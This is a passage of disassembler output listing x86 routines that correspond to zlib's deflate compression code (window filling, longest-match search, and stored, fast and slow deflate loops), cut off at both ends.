mov ecx, [esi+10h]
push edi
mov edi, [eax+14h]
cmp edi, ecx
jbe short loc_9AD4A9
mov edi, ecx
loc_9AD4A9: ; CODE XREF: sub_9AD496+F�j
test edi, edi
jz short loc_9AD4E0
push edi
push dword ptr [eax+10h]
push dword ptr [esi+0Ch]
call sub_9B323A ; memcpy
mov eax, [esi+1Ch]
add [esi+0Ch], edi
add [eax+10h], edi
add [esi+14h], edi
sub [esi+10h], edi
mov eax, [esi+1Ch]
sub [eax+14h], edi
mov esi, [esi+1Ch]
add esp, 0Ch
cmp dword ptr [esi+14h], 0
jnz short loc_9AD4E0
mov eax, [esi+8]
mov [esi+10h], eax
loc_9AD4E0: ; CODE XREF: sub_9AD496+15�j
; sub_9AD496+42�j
pop edi
pop esi
retn
sub_9AD496 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD4E3 proc near ; CODE XREF: .text:009AD9D5�p
; .text:009ADCE4�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 18h
mov eax, [ecx+7Ch]
mov edx, [ecx+38h]
mov [ebp+var_8], eax
mov eax, [ecx+90h]
push ebx
push esi
mov esi, [ecx+6Ch]
mov [ebp+var_C], eax
mov eax, [ecx+2Ch]
lea ebx, [eax-106h]
add edx, esi
cmp esi, ebx
push edi
mov edi, [ecx+78h]
jbe short loc_9AD520
sub esi, eax
add esi, 106h
mov [ebp+var_10], esi
jmp short loc_9AD524
; ---------------------------------------------------------------------------
loc_9AD520: ; CODE XREF: sub_9AD4E3+2E�j
and [ebp+var_10], 0
loc_9AD524: ; CODE XREF: sub_9AD4E3+3B�j
cmp edi, [ecx+8Ch]
lea eax, [edx+102h]
mov [ebp+var_14], eax
mov al, [edi+edx-1]
mov [ebp+var_1], al
mov al, [edi+edx]
mov [ebp+var_2], al
jb short loc_9AD546
shr [ebp+var_8], 2
loc_9AD546: ; CODE XREF: sub_9AD4E3+5D�j
mov eax, [ecx+74h]
sub_9AD4E3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_9AD549 proc near
cmp [ebp-0Ch], eax
mov [ebp-18h], eax
jbe short loc_9AD554
mov [ebp-0Ch], eax
loc_9AD554: ; CODE XREF: sub_9AD549+6�j
mov eax, [ebp+8]
loc_9AD557: ; CODE XREF: sub_9AD549+CE�j
mov esi, [ecx+38h]
add esi, eax
mov al, [ebp-2]
cmp [esi+edi], al
jnz loc_9AD5FF
mov al, [ebp-1]
cmp [esi+edi-1], al
jnz loc_9AD5FF
mov al, [esi]
cmp al, [edx]
jnz loc_9AD5FF
inc esi
mov al, [esi]
cmp al, [edx+1]
jnz short loc_9AD5FF
mov ebx, [ebp-14h]
inc edx
inc edx
inc esi
loc_9AD58D: ; CODE XREF: sub_9AD549+86�j
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
inc edx
mov al, [edx]
inc esi
cmp al, [esi]
jnz short loc_9AD5D1
cmp edx, ebx
jb short loc_9AD58D
loc_9AD5D1: ; CODE XREF: sub_9AD549+4A�j
; sub_9AD549+52�j ...
mov eax, edx
sub eax, ebx
add eax, 102h
cmp eax, edi
lea edx, [ebx-102h]
jle short loc_9AD5FF
cmp eax, [ebp-0Ch]
mov esi, [ebp+8]
mov [ecx+70h], esi
mov edi, eax
jge short loc_9AD61D
lea esi, [eax+edx]
mov al, [esi-1]
mov [ebp-1], al
mov al, [esi]
mov [ebp-2], al
loc_9AD5FF: ; CODE XREF: sub_9AD549+19�j
; sub_9AD549+26�j ...
mov esi, [ecx+34h]
and esi, [ebp+8]
mov eax, [ecx+40h]
movzx eax, word ptr [eax+esi*2]
cmp eax, [ebp-10h]
mov [ebp+8], eax
jbe short loc_9AD61D
dec dword ptr [ebp-8]
jnz loc_9AD557
loc_9AD61D: ; CODE XREF: sub_9AD549+A6�j
; sub_9AD549+C9�j
mov eax, [ebp-18h]
cmp edi, eax
ja short loc_9AD626
mov eax, edi
loc_9AD626: ; CODE XREF: sub_9AD549+D9�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AD549 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_9AD62B proc near ; CODE XREF: .text:009AD9EA�p
; .text:009ADCFC�p
push ebx
push esi
mov esi, eax
mov ecx, [esi+38h]
mov eax, [esi+6Ch]
add eax, ecx
add ecx, edi
mov bl, [ecx]
cmp bl, [eax]
lea edx, [eax+102h]
jnz short loc_9AD6AF
mov bl, [ecx+1]
cmp bl, [eax+1]
jnz short loc_9AD6AF
inc eax
inc eax
inc ecx
inc ecx
loc_9AD651: ; CODE XREF: sub_9AD62B+68�j
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
inc eax
mov bl, [eax]
inc ecx
cmp bl, [ecx]
jnz short loc_9AD695
cmp eax, edx
jb short loc_9AD651
loc_9AD695: ; CODE XREF: sub_9AD62B+2C�j
; sub_9AD62B+34�j ...
sub eax, edx
add eax, 102h
cmp eax, 3
jl short loc_9AD6AF
mov [esi+70h], edi
mov esi, [esi+74h]
cmp eax, esi
jbe short loc_9AD6B2
mov eax, esi
jmp short loc_9AD6B2
; ---------------------------------------------------------------------------
loc_9AD6AF: ; CODE XREF: sub_9AD62B+18�j
; sub_9AD62B+20�j ...
push 2
pop eax
loc_9AD6B2: ; CODE XREF: sub_9AD62B+7E�j
; sub_9AD62B+82�j
pop esi
pop ebx
retn
sub_9AD62B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AD6B5 proc near ; CODE XREF: sub_9AD804+24�p
; .text:009AD942�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ebx, [esi+2Ch]
push edi
loc_9AD6C0: ; CODE XREF: sub_9AD6B5+145�j
mov edi, [esi+3Ch]
sub edi, [esi+74h]
mov eax, [esi+6Ch]
mov ecx, [esi+2Ch]
sub edi, eax
lea ecx, [ebx+ecx-106h]
cmp eax, ecx
mov [ebp+var_8], edi
jb short loc_9AD742
mov eax, [esi+38h]
push ebx
lea ecx, [eax+ebx]
push ecx
push eax
call sub_9B323A ; memcpy
mov eax, [esi+4Ch]
mov ecx, [esi+44h]
sub [esi+70h], ebx
sub [esi+6Ch], ebx
add esp, 0Ch
sub [esi+5Ch], ebx
mov [ebp+var_4], eax
lea eax, [ecx+eax*2]
loc_9AD702: ; CODE XREF: sub_9AD6B5+64�j
dec eax
dec eax
movzx ecx, word ptr [eax]
mov edx, ecx
sub edx, ebx
cmp ecx, ebx
sbb ecx, ecx
not ecx
and ecx, edx
dec [ebp+var_4]
mov [eax], cx
jnz short loc_9AD702
mov eax, [esi+40h]
mov [ebp+var_4], ebx
lea eax, [eax+ebx*2]
loc_9AD724: ; CODE XREF: sub_9AD6B5+86�j
dec eax
dec eax
movzx ecx, word ptr [eax]
mov edx, ecx
sub edx, ebx
cmp ecx, ebx
sbb ecx, ecx
not ecx
and ecx, edx
dec [ebp+var_4]
mov [eax], cx
jnz short loc_9AD724
add edi, ebx
mov [ebp+var_8], edi
loc_9AD742: ; CODE XREF: sub_9AD6B5+25�j
mov edi, [esi]
cmp dword ptr [edi+4], 0
jz loc_9AD800
mov eax, [esi+74h]
add eax, [esi+6Ch]
mov ecx, [edi+4]
add eax, [esi+38h]
mov edx, [ebp+var_8]
cmp ecx, edx
mov [ebp+var_C], eax
mov [ebp+var_4], ecx
jbe short loc_9AD76A
mov [ebp+var_4], edx
loc_9AD76A: ; CODE XREF: sub_9AD6B5+B0�j
mov edx, [ebp+var_4]
test edx, edx
jnz short loc_9AD775
xor eax, eax
jmp short loc_9AD7C1
; ---------------------------------------------------------------------------
loc_9AD775: ; CODE XREF: sub_9AD6B5+BA�j
sub ecx, edx
mov [edi+4], ecx
mov ecx, [edi+1Ch]
mov ecx, [ecx+18h]
cmp ecx, 1
jnz short loc_9AD792
push edx
push dword ptr [edi]
push dword ptr [edi+30h]
call sub_9ACEF5
jmp short loc_9AD7A2
; ---------------------------------------------------------------------------
loc_9AD792: ; CODE XREF: sub_9AD6B5+CE�j
cmp ecx, 2
jnz short loc_9AD7AB
push edx
push dword ptr [edi]
push dword ptr [edi+30h]
call sub_9AD46B
loc_9AD7A2: ; CODE XREF: sub_9AD6B5+DB�j
mov [edi+30h], eax
mov eax, [ebp+var_C]
add esp, 0Ch
loc_9AD7AB: ; CODE XREF: sub_9AD6B5+E0�j
push [ebp+var_4]
push dword ptr [edi]
push eax
call sub_9B323A ; memcpy
mov eax, [ebp+var_4]
add [edi], eax
add esp, 0Ch
add [edi+8], eax
loc_9AD7C1: ; CODE XREF: sub_9AD6B5+BE�j
add [esi+74h], eax
mov edi, [esi+74h]
cmp edi, 3
jb short loc_9AD7EC
mov eax, [esi+6Ch]
mov ecx, [esi+38h]
lea edx, [eax+ecx]
movzx eax, byte ptr [edx]
mov ecx, [esi+58h]
mov [esi+48h], eax
shl eax, cl
movzx ecx, byte ptr [edx+1]
xor eax, ecx
and eax, [esi+54h]
mov [esi+48h], eax
loc_9AD7EC: ; CODE XREF: sub_9AD6B5+115�j
cmp edi, 106h
jnb short loc_9AD800
mov eax, [esi]
cmp dword ptr [eax+4], 0
jnz loc_9AD6C0
loc_9AD800: ; CODE XREF: sub_9AD6B5+93�j
; sub_9AD6B5+13D�j
pop edi
pop ebx
leave
retn
sub_9AD6B5 endp
; =============== S U B R O U T I N E =======================================
sub_9AD804 proc near ; DATA XREF: .text:009A4208�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
mov ecx, [esi+0Ch]
mov eax, 0FFFFh
add ecx, 0FFFFFFFBh
cmp ecx, eax
push edi
mov ebx, eax
jnb short loc_9AD81E
mov ebx, ecx
loc_9AD81E: ; CODE XREF: sub_9AD804+16�j
xor edi, edi
loc_9AD820: ; CODE XREF: sub_9AD804+92�j
; sub_9AD804+BF�j
mov eax, [esi+74h]
cmp eax, 1
ja short loc_9AD838
call sub_9AD6B5
mov eax, [esi+74h]
cmp eax, edi
jz loc_9AD8CF
loc_9AD838: ; CODE XREF: sub_9AD804+22�j
add [esi+6Ch], eax
mov edx, [esi+5Ch]
mov ecx, [esi+6Ch]
mov [esi+74h], edi
lea eax, [edx+ebx]
jz short loc_9AD84D
cmp ecx, eax
jb short loc_9AD884
loc_9AD84D: ; CODE XREF: sub_9AD804+43�j
sub ecx, eax
cmp edx, edi
mov [esi+74h], ecx
mov [esi+6Ch], eax
jl short loc_9AD860
mov ecx, [esi+38h]
add ecx, edx
jmp short loc_9AD862
; ---------------------------------------------------------------------------
loc_9AD860: ; CODE XREF: sub_9AD804+53�j
xor ecx, ecx
loc_9AD862: ; CODE XREF: sub_9AD804+5A�j
push edi
sub eax, edx
push eax
push ecx
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
mov eax, [esi]
cmp [eax+10h], edi
jz short loc_9AD8C9
loc_9AD884: ; CODE XREF: sub_9AD804+47�j
mov ecx, [esi+5Ch]
mov edx, [esi+6Ch]
mov eax, [esi+2Ch]
sub edx, ecx
sub eax, 106h
cmp edx, eax
jb short loc_9AD820
cmp ecx, edi
jl short loc_9AD8A3
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9AD8A5
; ---------------------------------------------------------------------------
loc_9AD8A3: ; CODE XREF: sub_9AD804+96�j
xor eax, eax
loc_9AD8A5: ; CODE XREF: sub_9AD804+9D�j
push edi
push edx
push eax
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
mov eax, [esi]
cmp [eax+10h], edi
jnz loc_9AD820
loc_9AD8C9: ; CODE XREF: sub_9AD804+7E�j
; sub_9AD804+D1�j ...
xor eax, eax
loc_9AD8CB: ; CODE XREF: sub_9AD804+118�j
; sub_9AD804+126�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9AD8CF: ; CODE XREF: sub_9AD804+2E�j
mov ebx, [esp+0Ch+arg_4]
cmp ebx, edi
jz short loc_9AD8C9
mov ecx, [esi+5Ch]
cmp ecx, edi
jl short loc_9AD8E5
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9AD8E7
; ---------------------------------------------------------------------------
loc_9AD8E5: ; CODE XREF: sub_9AD804+D8�j
xor eax, eax
loc_9AD8E7: ; CODE XREF: sub_9AD804+DF�j
xor edx, edx
cmp ebx, 4
setz dl
push edx
mov edx, [esi+6Ch]
sub edx, ecx
push edx
push eax
push esi
call sub_9B13EF
add esp, 10h
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
call sub_9AD496
mov eax, [esi]
cmp [eax+10h], edi
jnz short loc_9AD91E
cmp ebx, 4
jnz short loc_9AD8C9
push 2
pop eax
jmp short loc_9AD8CB
; ---------------------------------------------------------------------------
loc_9AD91E: ; CODE XREF: sub_9AD804+10E�j
xor eax, eax
cmp ebx, 4
setz al
lea eax, [eax+eax+1]
jmp short loc_9AD8CB
sub_9AD804 endp
; ---------------------------------------------------------------------------
push ebx
push ebp
push esi
mov esi, [esp+10h]
push edi
xor edi, edi
mov ebx, 106h
loc_9AD93B: ; CODE XREF: .text:009ADB72�j
; .text:009ADBAD�j
mov eax, [esi+74h]
cmp eax, ebx
jnb short loc_9AD961
call sub_9AD6B5
mov eax, [esi+74h]
cmp eax, ebx
jnb short loc_9AD959
cmp dword ptr [esp+18h], 0
jz loc_9ADBB3
loc_9AD959: ; CODE XREF: .text:009AD94C�j
test eax, eax
jz loc_9ADBBA
loc_9AD961: ; CODE XREF: .text:009AD940�j
push 3
pop ebp
cmp eax, ebp
jb short loc_9AD9B1
mov eax, [esi+48h]
mov ecx, [esi+58h]
mov edx, [esi+6Ch]
mov edi, [esi+34h]
shl eax, cl
mov ecx, [esi+38h]
movzx ecx, byte ptr [ecx+edx+2]
xor eax, ecx
and eax, [esi+54h]
mov ecx, [esi+44h]
mov [esi+48h], eax
mov ax, [ecx+eax*2]
and edi, edx
mov edx, [esi+40h]
mov [edx+edi*2], ax
mov eax, [esi+6Ch]
and eax, [esi+34h]
mov ecx, [esi+40h]
movzx edi, word ptr [ecx+eax*2]
mov eax, [esi+48h]
mov ecx, [esi+44h]
mov dx, [esi+6Ch]
mov [ecx+eax*2], dx
loc_9AD9B1: ; CODE XREF: .text:009AD966�j
test edi, edi
jz short loc_9AD9F2
mov eax, [esi+6Ch]
mov ecx, [esi+2Ch]
sub eax, edi
sub ecx, ebx
cmp eax, ecx
ja short loc_9AD9F2
mov ecx, [esi+88h]
cmp ecx, 2
jz short loc_9AD9DF
cmp ecx, ebp
jz short loc_9AD9E3
push edi
mov ecx, esi
call sub_9AD4E3
add esp, 4
jmp short loc_9AD9EF
; ---------------------------------------------------------------------------
loc_9AD9DF: ; CODE XREF: .text:009AD9CC�j
cmp ecx, ebp
jnz short loc_9AD9F2
loc_9AD9E3: ; CODE XREF: .text:009AD9D0�j
cmp eax, 1
jnz short loc_9AD9F2
mov eax, esi
call sub_9AD62B
loc_9AD9EF: ; CODE XREF: .text:009AD9DD�j
mov [esi+60h], eax
loc_9AD9F2: ; CODE XREF: .text:009AD9B3�j
; .text:009AD9C1�j ...
cmp [esi+60h], ebp
jb loc_9ADB1A
mov edx, [esi+16A0h]
mov cl, [esi+60h]
mov ebp, [esi+16A4h]
xor eax, eax
mov ax, [esi+6Ch]
sub ax, [esi+70h]
sub cl, 3
mov [ebp+edx*2+0], ax
mov ebp, [esi+16A0h]
mov edx, [esi+1698h]
mov [edx+ebp], cl
inc dword ptr [esi+16A0h]
movzx ecx, cl
movzx ecx, byte ptr dword_9A5F28[ecx]
add eax, 0FFFFh
lea ecx, [esi+ecx*4+498h]
inc word ptr [ecx]
cmp ax, 100h
movzx eax, ax
jnb short loc_9ADA5C
movzx eax, byte_9A5D28[eax]
jmp short loc_9ADA66
; ---------------------------------------------------------------------------
loc_9ADA5C: ; CODE XREF: .text:009ADA51�j
shr eax, 7
movzx eax, byte_9A5E28[eax]
loc_9ADA66: ; CODE XREF: .text:009ADA5A�j
lea eax, [esi+eax*4+988h]
inc word ptr [eax]
mov eax, [esi+169Ch]
xor ecx, ecx
dec eax
cmp [esi+16A0h], eax
mov eax, [esi+60h]
setz cl
sub [esi+74h], eax
cmp eax, [esi+80h]
mov ebp, ecx
mov ecx, [esi+74h]
ja short loc_9ADAF1
cmp ecx, 3
jb short loc_9ADAF1
dec eax
mov [esi+60h], eax
loc_9ADA9E: ; CODE XREF: .text:009ADAED�j
inc dword ptr [esi+6Ch]
mov edx, [esi+6Ch]
mov edi, [esi+48h]
mov ecx, [esi+58h]
mov eax, [esi+38h]
movzx eax, byte ptr [edx+eax+2]
shl edi, cl
mov ecx, [esi+44h]
xor eax, edi
and eax, [esi+54h]
mov edi, [esi+34h]
mov [esi+48h], eax
mov ax, [ecx+eax*2]
and edi, edx
mov edx, [esi+40h]
mov [edx+edi*2], ax
mov eax, [esi+6Ch]
and eax, [esi+34h]
mov ecx, [esi+40h]
movzx edi, word ptr [ecx+eax*2]
mov eax, [esi+48h]
mov ecx, [esi+44h]
mov dx, [esi+6Ch]
mov [ecx+eax*2], dx
dec dword ptr [esi+60h]
jnz short loc_9ADA9E
jmp short loc_9ADB6D
; ---------------------------------------------------------------------------
loc_9ADAF1: ; CODE XREF: .text:009ADA93�j
; .text:009ADA98�j
add [esi+6Ch], eax
mov eax, [esi+6Ch]
mov ecx, [esi+38h]
and dword ptr [esi+60h], 0
lea edx, [eax+ecx]
movzx eax, byte ptr [edx]
mov ecx, [esi+58h]
mov [esi+48h], eax
shl eax, cl
movzx ecx, byte ptr [edx+1]
xor eax, ecx
and eax, [esi+54h]
mov [esi+48h], eax
jmp short loc_9ADB70
; ---------------------------------------------------------------------------
loc_9ADB1A: ; CODE XREF: .text:009AD9F5�j
mov eax, [esi+6Ch]
mov ecx, [esi+38h]
mov al, [eax+ecx]
mov ecx, [esi+16A0h]
mov edx, [esi+16A4h]
and word ptr [edx+ecx*2], 0
mov ecx, [esi+1698h]
mov edx, [esi+16A0h]
mov [ecx+edx], al
inc dword ptr [esi+16A0h]
movzx eax, al
lea eax, [esi+eax*4+94h]
inc word ptr [eax]
mov eax, [esi+169Ch]
xor ecx, ecx
dec eax
cmp [esi+16A0h], eax
setz cl
dec dword ptr [esi+74h]
mov ebp, ecx
loc_9ADB6D: ; CODE XREF: .text:009ADAEF�j
inc dword ptr [esi+6Ch]
loc_9ADB70: ; CODE XREF: .text:009ADB18�j
test ebp, ebp
jz loc_9AD93B
mov ecx, [esi+5Ch]
test ecx, ecx
jl short loc_9ADB86
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9ADB88
; ---------------------------------------------------------------------------
loc_9ADB86: ; CODE XREF: .text:009ADB7D�j
xor eax, eax
loc_9ADB88: ; CODE XREF: .text:009ADB84�j
mov edx, [esi+6Ch]
push 0
sub edx, ecx
push edx
push eax
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
mov eax, [esi]
cmp dword ptr [eax+10h], 0
jnz loc_9AD93B
loc_9ADBB3: ; CODE XREF: .text:009AD953�j
; .text:009ADBFF�j
xor eax, eax
loc_9ADBB5: ; CODE XREF: .text:009ADC04�j
; .text:009ADC12�j
pop edi
pop esi
pop ebp
pop ebx
retn
; ---------------------------------------------------------------------------
loc_9ADBBA: ; CODE XREF: .text:009AD95B�j
mov ecx, [esi+5Ch]
test ecx, ecx
jl short loc_9ADBC8
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9ADBCA
; ---------------------------------------------------------------------------
loc_9ADBC8: ; CODE XREF: .text:009ADBBF�j
xor eax, eax
loc_9ADBCA: ; CODE XREF: .text:009ADBC6�j
mov edi, [esp+18h]
xor edx, edx
cmp edi, 4
setz dl
push edx
mov edx, [esi+6Ch]
sub edx, ecx
push edx
push eax
push esi
call sub_9B13EF
add esp, 10h
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
call sub_9AD496
mov eax, [esi]
cmp dword ptr [eax+10h], 0
jnz short loc_9ADC06
cmp edi, 4
jnz short loc_9ADBB3
push 2
pop eax
jmp short loc_9ADBB5
; ---------------------------------------------------------------------------
loc_9ADC06: ; CODE XREF: .text:009ADBFA�j
xor eax, eax
cmp edi, 4
setz al
lea eax, [eax+eax+1]
jmp short loc_9ADBB5
; ---------------------------------------------------------------------------
push ecx
push ebx
push ebp
push esi
mov esi, [esp+14h]
xor ebx, ebx
push edi
mov [esp+10h], ebx
loc_9ADC23: ; CODE XREF: .text:009ADE50�j
; .text:009ADE86�j ...
mov eax, [esi+74h]
mov edi, 106h
cmp eax, edi
jnb short loc_9ADC4D
call sub_9AD6B5
mov eax, [esi+74h]
cmp eax, edi
jnb short loc_9ADC45
cmp [esp+1Ch], ebx
jz loc_9ADE8C
loc_9ADC45: ; CODE XREF: .text:009ADC39�j
cmp eax, ebx
jz loc_9ADF33
loc_9ADC4D: ; CODE XREF: .text:009ADC2D�j
cmp eax, 3
jb short loc_9ADC9F
mov eax, [esi+48h]
mov ecx, [esi+58h]
mov edx, [esi+6Ch]
mov ebp, [esi+34h]
shl eax, cl
mov ecx, [esi+38h]
movzx ecx, byte ptr [ecx+edx+2]
xor eax, ecx
and eax, [esi+54h]
mov ecx, [esi+44h]
mov [esi+48h], eax
mov ax, [ecx+eax*2]
and ebp, edx
mov edx, [esi+40h]
mov [edx+ebp*2], ax
mov eax, [esi+6Ch]
and eax, [esi+34h]
mov ecx, [esi+40h]
movzx eax, word ptr [ecx+eax*2]
mov ecx, [esi+44h]
mov dx, [esi+6Ch]
mov [esp+10h], eax
mov eax, [esi+48h]
mov [ecx+eax*2], dx
loc_9ADC9F: ; CODE XREF: .text:009ADC50�j
mov eax, [esi+60h]
mov edx, [esp+10h]
cmp edx, ebx
push 2
mov [esi+78h], eax
mov eax, [esi+70h]
pop ebp
mov [esi+64h], eax
mov [esi+60h], ebp
jz short loc_9ADD2A
mov eax, [esi+78h]
cmp eax, [esi+80h]
jnb short loc_9ADD2A
mov eax, [esi+6Ch]
mov ecx, [esi+2Ch]
sub eax, edx
sub ecx, edi
cmp eax, ecx
ja short loc_9ADD2A
mov ecx, [esi+88h]
cmp ecx, ebp
jz short loc_9ADCEE
cmp ecx, 3
jz short loc_9ADCF3
push edx
mov ecx, esi
call sub_9AD4E3
add esp, 4
jmp short loc_9ADD01
; ---------------------------------------------------------------------------
loc_9ADCEE: ; CODE XREF: .text:009ADCDA�j
cmp ecx, 3
jnz short loc_9ADD04
loc_9ADCF3: ; CODE XREF: .text:009ADCDF�j
cmp eax, 1
jnz short loc_9ADD04
mov edi, edx
mov eax, esi
call sub_9AD62B
loc_9ADD01: ; CODE XREF: .text:009ADCEC�j
mov [esi+60h], eax
loc_9ADD04: ; CODE XREF: .text:009ADCF1�j
; .text:009ADCF6�j
mov eax, [esi+60h]
cmp eax, 5
ja short loc_9ADD2A
cmp dword ptr [esi+88h], 1
jz short loc_9ADD27
cmp eax, 3
jnz short loc_9ADD2A
mov eax, [esi+6Ch]
sub eax, [esi+70h]
cmp eax, 1000h
jbe short loc_9ADD2A
loc_9ADD27: ; CODE XREF: .text:009ADD13�j
mov [esi+60h], ebp
loc_9ADD2A: ; CODE XREF: .text:009ADCB7�j
; .text:009ADCC2�j ...
mov eax, [esi+78h]
cmp eax, 3
jb loc_9ADE94
cmp [esi+60h], eax
ja loc_9ADE94
mov ecx, [esi+74h]
mov eax, [esi+6Ch]
mov edx, [esi+16A0h]
mov edi, [esi+16A4h]
lea ebp, [eax+ecx-3]
mov cl, [esi+78h]
xor eax, eax
mov ax, [esi+6Ch]
sub ax, [esi+64h]
sub cl, 3
dec eax
mov [edi+edx*2], ax
mov edi, [esi+16A0h]
mov edx, [esi+1698h]
mov [edx+edi], cl
inc dword ptr [esi+16A0h]
movzx ecx, cl
movzx ecx, byte ptr dword_9A5F28[ecx]
add eax, 0FFFFh
lea ecx, [esi+ecx*4+498h]
inc word ptr [ecx]
cmp ax, 100h
movzx eax, ax
jnb short loc_9ADDAA
movzx eax, byte_9A5D28[eax]
jmp short loc_9ADDB4
; ---------------------------------------------------------------------------
loc_9ADDAA: ; CODE XREF: .text:009ADD9F�j
shr eax, 7
movzx eax, byte_9A5E28[eax]
loc_9ADDB4: ; CODE XREF: .text:009ADDA8�j
lea eax, [esi+eax*4+988h]
inc word ptr [eax]
mov eax, [esi+169Ch]
xor ecx, ecx
dec eax
cmp [esi+16A0h], eax
mov eax, [esi+78h]
setz cl
mov edi, ecx
xor ecx, ecx
inc ecx
sub ecx, eax
add [esi+74h], ecx
add eax, 0FFFFFFFEh
mov [esi+78h], eax
loc_9ADDE3: ; CODE XREF: .text:009ADE3C�j
inc dword ptr [esi+6Ch]
mov edx, [esi+6Ch]
cmp edx, ebp
ja short loc_9ADE39
mov eax, [esi+48h]
mov ecx, [esi+58h]
mov ebx, [esi+34h]
shl eax, cl
mov ecx, [esi+38h]
movzx ecx, byte ptr [ecx+edx+2]
xor eax, ecx
and eax, [esi+54h]
mov ecx, [esi+44h]
mov [esi+48h], eax
mov ax, [ecx+eax*2]
and ebx, edx
mov edx, [esi+40h]
mov [edx+ebx*2], ax
mov eax, [esi+6Ch]
and eax, [esi+34h]
mov ecx, [esi+40h]
movzx eax, word ptr [ecx+eax*2]
mov ecx, [esi+44h]
mov dx, [esi+6Ch]
mov [esp+10h], eax
mov eax, [esi+48h]
mov [ecx+eax*2], dx
xor ebx, ebx
loc_9ADE39: ; CODE XREF: .text:009ADDEB�j
dec dword ptr [esi+78h]
jnz short loc_9ADDE3
inc dword ptr [esi+6Ch]
cmp edi, ebx
mov eax, [esi+6Ch]
mov [esi+68h], ebx
mov dword ptr [esi+60h], 2
jz loc_9ADC23
mov edx, [esi+5Ch]
cmp edx, ebx
jl short loc_9ADE64
mov ecx, [esi+38h]
add ecx, edx
jmp short loc_9ADE66
; ---------------------------------------------------------------------------
loc_9ADE64: ; CODE XREF: .text:009ADE5B�j
xor ecx, ecx
loc_9ADE66: ; CODE XREF: .text:009ADE62�j
push ebx
sub eax, edx
push eax
push ecx
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
loc_9ADE81: ; CODE XREF: .text:009ADF1C�j
mov eax, [esi]
cmp [eax+10h], ebx
jnz loc_9ADC23
loc_9ADE8C: ; CODE XREF: .text:009ADC3F�j
; .text:009ADFB5�j
xor eax, eax
loc_9ADE8E: ; CODE XREF: .text:009ADFBE�j
; .text:009ADFD1�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9ADE94: ; CODE XREF: .text:009ADD30�j
; .text:009ADD39�j
cmp [esi+68h], ebx
jz loc_9ADF21
mov eax, [esi+6Ch]
mov ecx, [esi+38h]
mov al, [eax+ecx-1]
mov ecx, [esi+16A0h]
mov edx, [esi+16A4h]
mov [edx+ecx*2], bx
mov edx, [esi+16A0h]
mov ecx, [esi+1698h]
mov [ecx+edx], al
inc dword ptr [esi+16A0h]
movzx eax, al
lea eax, [esi+eax*4+94h]
inc word ptr [eax]
mov eax, [esi+169Ch]
dec eax
cmp [esi+16A0h], eax
jnz short loc_9ADF16
mov ecx, [esi+5Ch]
cmp ecx, ebx
jl short loc_9ADEF6
mov eax, [esi+38h]
add eax, ecx
jmp short loc_9ADEF8
; ---------------------------------------------------------------------------
loc_9ADEF6: ; CODE XREF: .text:009ADEED�j
xor eax, eax
loc_9ADEF8: ; CODE XREF: .text:009ADEF4�j
mov edx, [esi+6Ch]
push ebx
sub edx, ecx
push edx
push eax
push esi
call sub_9B13EF
mov eax, [esi+6Ch]
mov [esi+5Ch], eax
mov eax, [esi]
add esp, 10h
call sub_9AD496
loc_9ADF16: ; CODE XREF: .text:009ADEE6�j
inc dword ptr [esi+6Ch]
dec dword ptr [esi+74h]
jmp loc_9ADE81
; ---------------------------------------------------------------------------
loc_9ADF21: ; CODE XREF: .text:009ADE97�j
inc dword ptr [esi+6Ch]
dec dword ptr [esi+74h]
mov dword ptr [esi+68h], 1
jmp loc_9ADC23
; ---------------------------------------------------------------------------
loc_9ADF33: ; CODE XREF: .text:009ADC47�j
cmp [esi+68h], ebx
jz short loc_9ADF71
mov eax, [esi+6Ch]
